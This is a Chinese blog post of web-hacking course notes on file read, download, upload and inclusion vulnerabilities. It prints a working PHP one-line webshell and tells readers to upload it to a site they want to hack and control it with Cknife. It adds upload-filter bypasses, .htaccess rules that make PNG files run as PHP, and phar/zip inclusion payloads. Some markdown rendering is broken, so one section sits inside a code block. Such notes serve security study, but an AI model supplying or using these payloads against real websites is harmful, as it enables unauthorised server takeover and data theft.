<!DOCTYPE html><html lang="zh-CN"><head><meta charset="UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"><meta name="description" content="文件有关漏洞"><meta name="keywords" content=""><meta name="author" content="George"><meta name="copyright" content="George"><title>文件有关漏洞 | A.</title><link rel="shortcut icon" href="/melody-favicon.ico"><link rel="stylesheet" href="/css/index.css?version=1.6.1"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/font-awesome@latest/css/font-awesome.min.css?version=1.6.1"><link rel="dns-prefetch" href="https://cdn.staticfile.org"><link rel="dns-prefetch" href="https://cdn.bootcss.com"><link rel="dns-prefetch" href="https://creativecommons.org"><script>var GLOBAL_CONFIG = { 
  root: '/',
  algolia: undefined,
  localSearch: {"path":"search.xml","languages":{"hits_empty":"We didn't find any results for the search: ${query}"}},
  copy: {
    success: 'Copy successfully',
    error: 'Copy error',
    noSupport: 'The browser does not support'
  }
} </script><meta name="generator" content="Hexo 4.2.0"></head><body><i class="fa fa-arrow-right" id="toggle-sidebar" aria-hidden="true"></i><div id="sidebar"><div class="toggle-sidebar-info text-center"><span data-toggle="Toggle article">Toggle site</span><hr></div><div class="sidebar-toc"><div class="sidebar-toc__title">Catalog</div><div class="sidebar-toc__progress"><span class="progress-notice">You've read</span><span class="progress-num">0</span><span class="progress-percentage">%</span><div class="sidebar-toc__progress-bar"></div></div><div class="sidebar-toc__content"><ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#文件读取"><span class="toc-number">1.</span> <span class="toc-text">文件读取</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#文件下载"><span class="toc-number">2.</span> <span class="toc-text">文件下载</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#文件上传"><span class="toc-number">3.</span> <span class="toc-text">文件上传</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#一句话木马"><span class="toc-number">3.1.</span> <span class="toc-text">一句话木马</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#一些文件上传的绕过方法"><span class="toc-number">3.2.</span> <span class="toc-text">一些文件上传的绕过方法</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#黑名单文件类型"><span class="toc-number">3.2.1.</span> <span class="toc-text">黑名单文件类型</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#MIME验证"><span class="toc-number">3.2.2.</span> <span class="toc-text">MIME验证</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#JS验证"><span class="toc-number">3.2.3.</span> <span class="toc-text">JS验证</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#内容验证"><span class="toc-number">3.2.4.</span> <span class="toc-text">内容验证</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#htaccess"><span class="toc-number">3.2.5.</span> <span class="toc-text">.htaccess</span></a></li></ol></li></ol></li></ol></div></div><div class="author-info hide"><div class="author-info__avatar text-center"><img src="/img/avatar.png"></div><div class="author-info__name text-center">George</div><div class="author-info__description text-center">Here recording my growth of technology and hope you can gain something here.</div><hr><div class="author-info-articles"><a class="author-info-articles__archives article-meta" href="/archives"><span class="pull-left">Articles</span><span class="pull-right">111</span></a><a class="author-info-articles__tags article-meta" href="/tags"><span class="pull-left">Tags</span><span class="pull-right">17</span></a><a class="author-info-articles__categories article-meta" href="/categories"><span class="pull-left">Categories</span><span class="pull-right">18</span></a></div></div></div><div id="content-outer"><div id="top-container" style="background-image: url(https://Albatross-G.github.io/img/a1.png)"><div id="page-header"><span class="pull-left"> <a id="site-name" href="/">A.</a></span><i class="fa fa-bars toggle-menu pull-right" aria-hidden="true"></i><span class="pull-right menus"><a class="site-page social-icon search"><i class="fa fa-search"></i><span> Search</span></a><a class="site-page" href="/">Home</a><a class="site-page" href="/archives">Archives</a><a class="site-page" href="/tags">Tags</a><a class="site-page" href="/categories">Categories</a></span></div><div id="post-info"><div id="post-title">文件有关漏洞</div><div id="post-meta"><time class="post-meta__date"><i class="fa fa-calendar" aria-hidden="true"></i> 2020-05-16</time><span class="post-meta__separator">|</span><i class="fa fa-inbox post-meta__icon" aria-hidden="true"></i><a class="post-meta__categories" href="/categories/%E7%B1%B3%E6%96%AF%E7%89%B9%E5%AE%89%E5%85%A8%E5%9F%B9%E8%AE%AD/">米斯特安全培训</a></div></div></div><div class="layout" id="content-inner"><article id="post"><div class="article-container" id="post-content"><h2 id="文件读取"><a href="#文件读取" class="headerlink" title="文件读取"></a>文件读取</h2><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?file&#x3D;xxx;</span><br></pre></td></tr></table></figure>

<h2 id="文件下载"><a href="#文件下载" class="headerlink" title="文件下载"></a>文件下载</h2><p>先找到下载链接，比如</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http:&#x2F;&#x2F;abc&#x2F;hhh&#x2F;download.php?file&#x3D;.&#x2F;download&#x2F;abcdef.txt</span><br></pre></td></tr></table></figure>

<p>其中file=之后的内容可能会被加密。</p>
<p>改变file=之后的文件名就可以下载该文件</p>
<h2 id="文件上传"><a href="#文件上传" class="headerlink" title="文件上传"></a>文件上传</h2><h3 id="一句话木马"><a href="#一句话木马" class="headerlink" title="一句话木马"></a>一句话木马</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php @eval($_POST[&#39;key&#39;]);?&gt;</span><br></pre></td></tr></table></figure>

<p>将此文件保存为1.php,然后将此文件上传到你想黑的网站里。</p>
<p>使用Cknife进行入侵，其中后面小空格里填上你一句话里的key。</p>
<blockquote>
<p>原理：eval函数执行函数内的操作，而当你把一段命令用POST传过去后，服务器端便会执行这段php代码</p>
</blockquote>
<h3 id="一些文件上传的绕过方法"><a href="#一些文件上传的绕过方法" class="headerlink" title="一些文件上传的绕过方法"></a>一些文件上传的绕过方法</h3><h4 id="黑名单文件类型"><a href="#黑名单文件类型" class="headerlink" title="黑名单文件类型"></a>黑名单文件类型</h4><p><img src="/2020/05/16/%E6%96%87%E4%BB%B6%E6%9C%89%E5%85%B3%E6%BC%8F%E6%B4%9E/1.png" alt="1"></p>
<p>这时可以使用bp抓包，把名字改一下即可绕过。比如在.php后加个空格、改个大小写、用php5、phtml此类扩展名。</p>
<h4 id="MIME验证"><a href="#MIME验证" class="headerlink" title="MIME验证"></a>MIME验证</h4><p>抓包修改content-type：<a href="https://www.fujieace.com/penetration-test/file-upload-mime.html" target="_blank" rel="noopener">相关内容。</a></p>
<h4 id="JS验证"><a href="#JS验证" class="headerlink" title="JS验证"></a>JS验证</h4><ol>
<li>可以进用JS</li>
<li>可以f12查看源代码，然后把有关验证JS的链接给删除。</li>
</ol>
<h4 id="内容验证"><a href="#内容验证" class="headerlink" title="内容验证"></a>内容验证</h4><p>即后缀名可以随便修改，但是文件内容必须符合，比如要求文件格式为jpg。</p>
<p>此时我们就可以把一句话隐写到php文件里，形成图片一句话，从而绕过验证。</p>
<p><a href="http://albatross-g.site/2020/01/11/%E6%96%87%E4%BB%B6%E7%9A%84%E5%90%88%E5%B9%B6%E4%B8%8E%E5%88%86%E7%A6%BB/" target="_blank" rel="noopener">详情见我之前的文章。</a></p>
<h4 id="htaccess"><a href="#htaccess" class="headerlink" title=".htaccess"></a>.htaccess</h4><p>这题是在ctfhub里刷到的一道比较新颖的题【我见识短浅】，来好好的记录一下啦。</p>
<p>这道题参考了<a href="https://www.jianshu.com/p/c674904a711e" target="_blank" rel="noopener">这篇博客。</a></p>
<blockquote>
<p>.htaccess文件(或者”分布式配置文件”）,全称是Hypertext Access(超文本入口)。提供了针对目录改变配置的方法， 即在一个特定的文档目录中放置一个包含一个或多个指令的文件， 以作用于此目录及其所有子目录。作为用户，所能使用的命令受到限制。管理员可以通过Apache的AllowOverride指令来设置。 概述来说，htaccess文件是Apache服务器中的一个配置文件，它负责相关目录下的网页配置。通过htaccess文件，可以帮我们实现：网页301重定向、自定义404错误页面、改变文件扩展名、允许/阻止特定的用户或者目录的访问、禁止目录列表、配置默认文档等功能。</p>
</blockquote>
<p>根据上面文档的总结，修改.htaccess文件大致上有两种方法：</p>
<ul>
<li><pre><code>AddType application/x-httpd-php .png   //png就是修改为的文件类型
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line">  将此文件命名为.htaccess上传即可</span><br><span class="line"></span><br><span class="line">-</span><br></pre></td></tr></table></figure>
&lt;FilesMatch &quot;muma.php&quot;&gt;   
//双引号里就是匹配的文件名，也就是一句话木马的文件名【没有.php好像也可以】
    SetHandler application/x-httpd-php
&lt;FilesMatch&gt;
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line">二者选一上传之后再上传muma.png，这个配置文件就可以帮你把png改成php</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"></span><br><span class="line">## 文件包含</span><br><span class="line"></span><br><span class="line">### %00截断</span><br><span class="line"></span><br><span class="line">%00截断基本已经全部禁用，可以参考[这篇](https:&#x2F;&#x2F;blog.csdn.net&#x2F;zpy1998zpy&#x2F;article&#x2F;details&#x2F;80545408)。</span><br><span class="line"></span><br><span class="line">### phar&#x2F;zip协议</span><br><span class="line"></span><br><span class="line">我们可能会遇到以下两种限制</span><br><span class="line"></span><br><span class="line">&#96;&#96;&#96;php</span><br><span class="line">&lt;?php</span><br><span class="line"></span><br><span class="line">$file &#x3D; $_GET[&#39;file&#39;];</span><br><span class="line"></span><br><span class="line">if(isset($file) &amp;&amp; strtolower(substr($file, -4)) &#x3D;&#x3D; &quot;.jpg&quot;)&#123;</span><br><span class="line">	include($file);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure>
</code></pre></li>
</ul>
<p>此时我们可以实行以下操作：</p>
<ol>
<li>创建一个1.php，里面写入php代码【phpinfo()】。</li>
<li>将此文件重命名为1.jpg【代码限制要jpg】。</li>
<li>压缩1.jpg为1.zip</li>
</ol>
<p>构建payload：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">http:&#x2F;&#x2F;localhost&#x2F;file&#x2F;1.php?file&#x3D;phar:&#x2F;&#x2F;c.zip&#x2F;c.jpg</span><br><span class="line">或</span><br><span class="line">http:&#x2F;&#x2F;localhost&#x2F;file&#x2F;1.php?file&#x3D;zip:&#x2F;&#x2F;c.zip%23c.jpg</span><br></pre></td></tr></table></figure>





<p>接下来这种情况也会遇到：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">    $file &#x3D; $_GET[&#39;file&#39;];</span><br><span class="line">    include($file.&quot;.jpg&quot;);</span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure>

<p>此时重复以上三步并构建：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">http:&#x2F;&#x2F;localhost&#x2F;file&#x2F;1.php?file&#x3D;phar:&#x2F;&#x2F;c.zip&#x2F;c</span><br><span class="line">或</span><br><span class="line">http:&#x2F;&#x2F;localhost&#x2F;file&#x2F;1.php?file&#x3D;zip:&#x2F;&#x2F;c.zip%23c</span><br></pre></td></tr></table></figure>

</div></article><div class="post-copyright"><div class="post-copyright__author"><span class="post-copyright-meta">Author: </span><span class="post-copyright-info"><a href="mailto:undefined">George</a></span></div><div class="post-copyright__type"><span class="post-copyright-meta">Link: </span><span class="post-copyright-info"><a href="http://yoursite.com/2020/05/16/%E6%96%87%E4%BB%B6%E6%9C%89%E5%85%B3%E6%BC%8F%E6%B4%9E/">http://yoursite.com/2020/05/16/%E6%96%87%E4%BB%B6%E6%9C%89%E5%85%B3%E6%BC%8F%E6%B4%9E/</a></span></div><div class="post-copyright__notice"><span class="post-copyright-meta">Copyright Notice: </span><span class="post-copyright-info">All articles in this blog are licensed under <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/" target="_blank" rel="noopener">CC BY-NC-SA 4.0</a> unless stating additionally.</span></div></div><div class="post-meta__tag-list"></div><div class="addthis_inline_share_toolbox pull-right"></div><script src="//s7.addthis.com/js/300/addthis_widget.js#pubid=undefined" async></script><nav id="pagination"><div class="prev-post pull-left"><a href="/2020/05/16/%E6%9C%89%E8%B6%A3%E7%9A%84%E5%B0%8F%E6%8A%80%E5%B7%A7/"><i class="fa fa-chevron-left">  </i><span>有趣的小技巧</span></a></div><div class="next-post pull-right"><a href="/2020/05/10/sql%E6%B3%A8%E5%85%A5%E5%9F%BA%E7%A1%80/"><span>sql注入基础</span><i class="fa fa-chevron-right"></i></a></div></nav></div></div><footer class="footer-bg" style="background-image: url(https://Albatross-G.github.io/img/a1.png)"><div class="layout" id="footer"><div class="copyright">&copy;2013 - 2020 By George</div><div class="framework-info"><span>Driven - </span><a href="http://hexo.io" target="_blank" rel="noopener"><span>Hexo</span></a><span class="footer-separator">|</span><span>Theme - </span><a href="https://github.com/Molunerfinn/hexo-theme-melody" target="_blank" rel="noopener"><span>Melody</span></a></div><div class="busuanzi"><script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script><span id="busuanzi_container_page_pv"><i class="fa fa-file-o"></i><span id="busuanzi_value_page_pv"></span><span></span></span></div></div></footer><i class="fa fa-arrow-up" id="go-up" aria-hidden="true"></i><script src="https://cdn.jsdelivr.net/npm/animejs@latest/anime.min.js"></script><script src="https://cdn.jsdelivr.net/npm/jquery@latest/dist/jquery.min.js"></script><script src="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@latest/dist/jquery.fancybox.min.js"></script><script src="https://cdn.jsdelivr.net/npm/velocity-animate@latest/velocity.min.js"></script><script src="https://cdn.jsdelivr.net/npm/velocity-ui-pack@latest/velocity.ui.min.js"></script><script src="/js/utils.js?version=1.6.1"></script><script src="/js/fancybox.js?version=1.6.1"></script><script src="/js/sidebar.js?version=1.6.1"></script><script src="/js/copy.js?version=1.6.1"></script><script src="/js/fireworks.js?version=1.6.1"></script><script src="/js/transition.js?version=1.6.1"></script><script src="/js/scroll.js?version=1.6.1"></script><script src="/js/head.js?version=1.6.1"></script><script src="/js/search/local-search.js"></script><script>if(/Android|webOS|iPhone|iPod|BlackBerry/i.test(navigator.userAgent)) {
  $('#nav').addClass('is-mobile')
  $('footer').addClass('is-mobile')
}</script><div class="search-dialog" id="local-search"><div class="search-dialog__title" id="local-search-title">Local search</div><div id="local-input-panel"><div id="local-search-input"><div class="local-search-box"><input class="local-search-box--input" placeholder="Search for Posts"></div></div></div><hr><div id="local-search-results"><div id="local-hits"></div><div id="local-stats"><div class="local-search-stats__hr" id="hr"><span>Powered by</span> <a href="https://github.com/wzpan/hexo-generator-search" target="_blank" rel="noopener" style="color:#49B1F5;">hexo-generator-search</a></div></div></div><span class="search-close-button"><i class="fa fa-times"></i></span></div><div class="search-mask"></div><script src="/live2dw/lib/L2Dwidget.min.js?094cbace49a39548bed64abff5988b05"></script><script>L2Dwidget.init({"pluginRootPath":"live2dw/","pluginJsPath":"lib/","pluginModelPath":"assets/","tagMode":false,"log":false,"model":{"jsonPath":"/live2dw/assets/hijiki.model.json"},"display":{"position":"right","width":150,"height":300},"mobile":{"show":true}});</script></body></html>